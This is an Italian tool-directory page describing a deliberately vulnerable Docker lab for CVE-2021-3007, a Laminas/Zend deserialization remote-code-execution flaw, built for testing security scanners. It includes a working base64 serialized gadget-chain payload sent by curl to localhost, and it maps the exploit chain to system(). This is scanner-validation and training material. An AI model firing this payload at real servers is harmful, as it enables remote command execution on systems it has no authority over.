Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/kre80r/cve-2021-3007-vulnerable
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubkre80r/cve-2021-3007-vulnerable

cve-2021-3007-vulnerable

CVE-2021-3007 Ambiente di test vulnerabile - Laminas/Zend Framework Deserializzazione RCE

Vedi Repository
8 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Ambiente di test vulnerabile CVE-2021-3007

Docker CVE CVSS

Ambiente di test volutamente vulnerabile per la validazione del rilevamento di CVE-2021-3007 negli scanner di sicurezza.

Panoramica della vulnerabilità

AttributoValore
ID CVECVE-2021-3007
GravitàCritica (CVSS 9.8)
TipoDeserializzazione non sicura → RCE
Componenti interessatiLaminas HTTP < 2.14.2, Zend Framework 3.0.0
CWECWE-502 (Deserializzazione di dati non attendibili)

Avvio rapido

root@kitploit:~
# Clone repository
git clone https://github.com/KrE80r/CVE-2021-3007-vulnerable
cd CVE-2021-3007-vulnerable

# Start vulnerable environment
docker-compose up -d

# Verify it's running
curl http://localhost:8080

# Test with nuclei (optional)
nuclei -t CVE-2021-3007.yaml -u http://localhost:8080

# Cleanup
docker-compose down

Comando in una riga

root@kitploit:~
docker-compose up -d && sleep 3 && curl -s http://localhost:8080 | head -1

Test di sfruttamento manuale

root@kitploit:~
# Send serialized payload triggering RCE
curl -X POST http://localhost:8080/ \
  -d "data=TzoyODoiTGFtaW5hc1xIdHRwXFJlc3BvbnNlXFN0cmVhbSI6Mjp7czoxMDoiACoAY2xlYW51cCI7YjoxO3M6MTM6IgAqAHN0cmVhbU5hbWUiO086Mjg6IkxhbWluYXNcVmlld1xIZWxwZXJcR3JhdmF0YXIiOjI6e3M6NzoiACoAdmlldyI7TzozMzoiTGFtaW5hc1xWaWV3XFJlbmRlcmVyXFBocFJlbmRlcmVyIjoxOntzOjQ0OiIATGFtaW5hc1xWaWV3XFJlbmRlcmVyXFBocFJlbmRlcmVyAF9faGVscGVycyI7TzoyMToiTGFtaW5hc1xDb25maWdcQ29uZmlnIjoxOntzOjc6IgAqAGRhdGEiO2E6Mjp7czoxMDoiZXNjYXBlaHRtbCI7czo2OiJzeXN0ZW0iO3M6MTQ6ImVzY2FwZWh0bWxhdHRyIjtzOjE3OiJmaWxlX2dldF9jb250ZW50cyI7fX19czoxMzoiACoAYXR0cmlidXRlcyI7YToxOntzOjIyOiJlY2hvIG51Y2xlaUNWRTIwMjEzMDA3IjtpOjE7fX19"

# Expected: Response contains "nucleiCVE20213007" confirming RCE

Dettagli tecnici

Gadget Chain

root@kitploit:~
Laminas\Http\Response\Stream::__destruct()
  └─► Laminas\View\Helper\Gravatar::__toString()
        └─► Laminas\View\Renderer\PhpRenderer::plugin()
              └─► Laminas\Config\Config::get()
                    └─► system() / file_get_contents()

Componenti vulnerabili

PacchettoVersioneScopo
laminas/laminas-http2.14.1Componente HTTP vulnerabile
laminas/laminas-view2.12.0Componente della catena gadget
laminas/laminas-config3.7.0Componente della catena gadget

Endpoint vulnerabili

L'applicazione accetta dati serializzati tramite POST:

  • Percorso: / o /index.php
  • Parametri: data, payload, serialized
  • Codifica: Base64

Dettagli dell'ambiente

ComponenteValore
Immagine di basephp:8.1-apache
Porta8080
Containercve-2021-3007-vulnerable

File

root@kitploit:~
.
├── Dockerfile          # Container build configuration
├── docker-compose.yml  # Orchestration (one-shot setup)
├── index.php           # Vulnerable PHP application
├── LICENSE             # MIT License
└── README.md           # This file

Avviso di sicurezza

ATTENZIONE: Questo ambiente è volutamente vulnerabile esclusivamente a scopo di test di sicurezza.

NON:

  • Esporlo a reti pubbliche
  • Distribuirlo in ambienti di produzione
  • Lasciarlo in esecuzione senza supervisione
  • Usarlo per scopi malevoli

FARE:

  • Usarlo in ambienti di test isolati
  • Arrestare i container quando non in uso
  • Usarlo solo per ricerca di sicurezza legittima

Riferimenti

  • NVD - CVE-2021-3007
  • GitHub Advisory - GHSA-xx8f-qf9f-5fgw
  • Laminas Security Release
  • CheckPoint Research - FreakOut
  • Ambionics Research

Licenza

Licenza MIT - Solo per scopi di ricerca sulla sicurezza e formazione.


Creato per la validazione del template nuclei | projectdiscovery/nuclei-templates

Scarica lo strumento